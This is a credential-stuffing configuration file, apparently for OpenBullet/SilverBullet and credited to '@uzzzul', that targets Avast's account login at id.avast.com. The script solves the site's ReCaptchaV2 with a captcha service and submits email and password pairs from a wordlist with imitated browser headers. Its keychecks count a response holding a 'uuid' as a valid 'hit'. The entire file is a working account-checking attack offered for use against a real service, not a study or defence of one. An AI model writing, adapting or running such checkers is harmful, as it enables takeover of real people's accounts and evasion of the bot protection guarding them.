[SETTINGS]
{
  "Name": "avast",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-12-27T16:33:58.5948758+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "avast",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#CAPTCHA SOLVECAPTCHA ReCaptchaV2 "6LeA0-4UAAAAABtPEFEpcnB6PYG6aZknhhad2LaA" "https://id.avast.com/api/login/email" 

#LOGIN REQUEST POST "https://id.avast.com/api/login/email" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"rememberMe\":false,\"target\":null}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: id.avast.com" 
  HEADER "Origin: https://id.avast.com" 
  HEADER "recaptcha-token: <SOLUTION>" 
  HEADER "Referer: https://id.avast.com/sso" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-GPC: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 
  HEADER "x-sso-context: eyJ0YXJnZXQiOiJodHRwczovL215LmF2YXN0LmNvbS8iLCJwbGF0Zm9ybSI6bnVsbCwidHlwZSI6IldlYiJ9" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "invalid_input" 
    KEY "{}" 
  KEYCHAIN Success OR 
    KEY "{\"uuid\":\"" 

#author FUNCTION Constant "@uzzzul" -> CAP "configby" 

